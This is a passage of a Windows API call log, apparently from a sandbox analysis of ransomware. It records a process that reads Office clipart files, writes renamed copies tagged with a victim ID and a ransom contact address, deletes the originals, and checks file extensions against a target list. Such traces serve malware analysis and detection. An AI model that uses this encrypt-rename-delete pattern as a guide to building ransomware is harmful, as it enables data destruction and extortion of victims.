lpOverlapped=0x0) returned 1 [0063.758] WriteFile (in: hFile=0x358, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xed0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xed0, lpOverlapped=0x0) returned 1 [0063.758] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0063.759] WriteFile (in: hFile=0x358, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0063.759] SetEndOfFile (hFile=0x358) returned 1 [0063.759] CloseHandle (hObject=0x358) returned 1 [0063.760] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.760] SetEndOfFile (hFile=0x370) returned 1 [0063.760] CloseHandle (hObject=0x370) returned 1 [0063.760] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.761] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00273_.wmf")) returned 1 [0063.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 68 [0063.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 68 [0063.761] lstrlenW (lpString=".doc") returned 4 [0063.761] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.761] lstrlenW (lpString=".docx") returned 5 [0063.761] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.761] lstrlenW (lpString=".pdf") returned 4 [0063.761] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.761] lstrlenW (lpString=".xls") returned 4 [0063.761] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.761] lstrlenW (lpString=".xlsx") returned 5 [0063.761] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.761] lstrlenW (lpString=".ppt") returned 4 [0063.761] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 68 [0063.761] lstrlenW (lpString=".zip") returned 4 [0063.761] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.761] lstrlenW (lpString=".rar") returned 4 [0063.761] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.761] lstrlenW (lpString=".bz2") returned 4 [0063.761] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.761] lstrlenW (lpString=".7z") returned 3 [0063.761] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 68 [0063.761] lstrlenW (lpString=".dbf") returned 4 [0063.761] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 68 [0063.762] lstrlenW (lpString=".1cd") returned 4 [0063.762] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.762] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 68 [0063.762] lstrlenW (lpString=".jpg") returned 4 [0063.762] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.762] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 68 [0063.762] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 68 [0063.762] lstrlenW (lpString=".doc") returned 4 [0063.762] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.762] lstrlenW (lpString=".docx") returned 5 [0063.762] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.762] lstrlenW (lpString=".pdf") returned 4 [0063.762] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.762] lstrlenW (lpString=".xls") returned 4 [0063.762] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.762] lstrlenW (lpString=".xlsx") returned 5 [0063.762] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.762] lstrlenW (lpString=".ppt") returned 4 [0063.762] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.762] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 68 [0063.762] lstrlenW (lpString=".zip") returned 4 [0063.762] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.762] lstrlenW (lpString=".rar") returned 4 [0063.762] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.762] lstrlenW (lpString=".bz2") returned 4 [0063.762] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.762] lstrlenW (lpString=".7z") returned 3 [0063.762] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.762] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 68 [0063.762] lstrlenW (lpString=".dbf") returned 4 [0063.762] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.762] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 68 [0063.762] lstrlenW (lpString=".1cd") returned 4 [0063.762] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.762] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 68 [0063.762] lstrlenW (lpString=".jpg") returned 4 [0063.762] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.763] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0063.763] lstrlenW (lpString="BL00296_.WMF") returned 12 [0063.763] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00296_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0063.763] GetFileSizeEx (in: hFile=0x370, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=812) returned 1 [0063.763] CloseHandle (hObject=0x370) returned 1 [0063.763] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00296_.wmf")) returned 0x220 [0063.763] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00296_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0063.763] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00296_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0063.763] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.763] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.763] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00296_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0063.764] GetLastError () returned 0x0 [0063.764] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x32c, lpOverlapped=0x0) returned 1 [0063.774] WriteFile (in: hFile=0x358, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x330, lpOverlapped=0x0) returned 1 [0063.774] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0063.774] WriteFile (in: hFile=0x358, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0063.774] SetEndOfFile (hFile=0x358) returned 1 [0063.776] CloseHandle (hObject=0x358) returned 1 [0063.779] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.779] SetEndOfFile (hFile=0x370) returned 1 [0063.781] CloseHandle (hObject=0x370) returned 1 [0063.782] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.782] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00296_.wmf")) returned 1 [0063.782] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 68 [0063.782] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 68 [0063.782] lstrlenW (lpString=".doc") returned 4 [0063.782] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.782] lstrlenW (lpString=".docx") returned 5 [0063.782] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.782] lstrlenW (lpString=".pdf") returned 4 [0063.782] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.782] lstrlenW (lpString=".xls") returned 4 [0063.782] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.782] lstrlenW (lpString=".xlsx") returned 5 [0063.782] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.782] lstrlenW (lpString=".ppt") returned 4 [0063.782] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.782] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 68 [0063.782] lstrlenW (lpString=".zip") returned 4 [0063.783] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.783] lstrlenW (lpString=".rar") returned 4 [0063.783] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.783] lstrlenW (lpString=".bz2") returned 4 [0063.783] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.783] lstrlenW (lpString=".7z") returned 3 [0063.783] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.783] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 68 [0063.783] lstrlenW (lpString=".dbf") returned 4 [0063.783] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.783] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 68 [0063.783] lstrlenW (lpString=".1cd") returned 4 [0063.783] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.783] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 68 [0063.783] lstrlenW (lpString=".jpg") returned 4 [0063.783] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.783] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 68 [0063.783] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 68 [0063.783] lstrlenW (lpString=".doc") returned 4 [0063.783] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.783] lstrlenW (lpString=".docx") returned 5 [0063.783] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.783] lstrlenW (lpString=".pdf") returned 4 [0063.783] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.783] lstrlenW (lpString=".xls") returned 4 [0063.783] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.783] lstrlenW (lpString=".xlsx") returned 5 [0063.783] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.783] lstrlenW (lpString=".ppt") returned 4 [0063.783] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.783] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 68 [0063.783] lstrlenW (lpString=".zip") returned 4 [0063.783] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.783] lstrlenW (lpString=".rar") returned 4 [0063.783] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.783] lstrlenW (lpString=".bz2") returned 4 [0063.783] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.784] lstrlenW (lpString=".7z") returned 3 [0063.784] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.784] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 68 [0063.784] lstrlenW (lpString=".dbf") returned 4 [0063.784] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.784] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 68 [0063.784] lstrlenW (lpString=".1cd") returned 4 [0063.784] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.784] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 68 [0063.784] lstrlenW (lpString=".jpg") returned 4 [0063.784] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.784] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.784] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.784] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00524_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0063.784] GetLastError () returned 0x0 [0063.784] ReadFile (in: hFile=0x350, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x1b54, lpOverlapped=0x0) returned 1 [0063.832] WriteFile (in: hFile=0x384, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x1b60, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x1b60, lpOverlapped=0x0) returned 1 [0063.834] ReadFile (in: hFile=0x350, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0063.834] WriteFile (in: hFile=0x384, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0063.834] SetEndOfFile (hFile=0x384) returned 1 [0063.834] CloseHandle (hObject=0x384) returned 1 [0063.835] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.835] SetEndOfFile (hFile=0x350) returned 1 [0063.835] CloseHandle (hObject=0x350) returned 1 [0063.836] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.836] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00524_.wmf")) returned 1 [0063.836] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 68 [0063.836] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 68 [0063.836] lstrlenW (lpString=".doc") returned 4 [0063.836] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.836] lstrlenW (lpString=".docx") returned 5 [0063.836] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.836] lstrlenW (lpString=".pdf") returned 4 [0063.836] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.836] lstrlenW (lpString=".xls") returned 4 [0063.837] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.837] lstrlenW (lpString=".xlsx") returned 5 [0063.837] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.837] lstrlenW (lpString=".ppt") returned 4 [0063.837] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.837] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 68 [0063.837] lstrlenW (lpString=".zip") returned 4 [0063.837] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.837] lstrlenW (lpString=".rar") returned 4 [0063.837] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.837] lstrlenW (lpString=".bz2") returned 4 [0063.837] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.837] lstrlenW (lpString=".7z") returned 3 [0063.837] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.837] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 68 [0063.837] lstrlenW (lpString=".dbf") returned 4 [0063.837] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.837] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 68 [0063.837] lstrlenW (lpString=".1cd") returned 4 [0063.837] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.837] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 68 [0063.837] lstrlenW (lpString=".jpg") returned 4 [0063.837] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.842] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.842] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.842] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00525_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00525_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0063.842] GetLastError () returned 0x0 [0063.842] ReadFile (in: hFile=0x350, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x2576, lpOverlapped=0x0) returned 1 [0063.941] WriteFile (in: hFile=0x384, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x2580, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x2580, lpOverlapped=0x0) returned 1 [0063.942] ReadFile (in: hFile=0x350, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0063.942] WriteFile (in: hFile=0x384, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0063.942] SetEndOfFile (hFile=0x384) returned 1 [0063.942] CloseHandle (hObject=0x384) returned 1 [0063.943] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.943] SetEndOfFile (hFile=0x350) returned 1 [0063.944] CloseHandle (hObject=0x350) returned 1 [0063.944] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00525_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.945] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00525_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00525_.wmf")) returned 1 [0063.945] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 68 [0063.945] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 68 [0063.945] lstrlenW (lpString=".doc") returned 4 [0063.945] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.945] lstrlenW (lpString=".docx") returned 5 [0063.945] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.945] lstrlenW (lpString=".pdf") returned 4 [0063.945] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.945] lstrlenW (lpString=".xls") returned 4 [0063.945] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.945] lstrlenW (lpString=".xlsx") returned 5 [0063.945] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.945] lstrlenW (lpString=".ppt") returned 4 [0063.946] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 68 [0063.946] lstrlenW (lpString=".zip") returned 4 [0063.946] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.946] lstrlenW (lpString=".rar") returned 4 [0063.946] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.946] lstrlenW (lpString=".bz2") returned 4 [0063.946] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.946] lstrlenW (lpString=".7z") returned 3 [0063.946] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 68 [0063.946] lstrlenW (lpString=".dbf") returned 4 [0063.946] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 68 [0063.946] lstrlenW (lpString=".1cd") returned 4 [0063.946] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 68 [0063.946] lstrlenW (lpString=".jpg") returned 4 [0063.946] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.946] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.946] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.946] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00985_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0063.947] GetLastError () returned 0x0 [0063.947] ReadFile (in: hFile=0x350, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0xeb8, lpOverlapped=0x0) returned 1 [0063.958] WriteFile (in: hFile=0x384, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec0, lpOverlapped=0x0) returned 1 [0063.959] ReadFile (in: hFile=0x350, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0063.959] WriteFile (in: hFile=0x384, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, 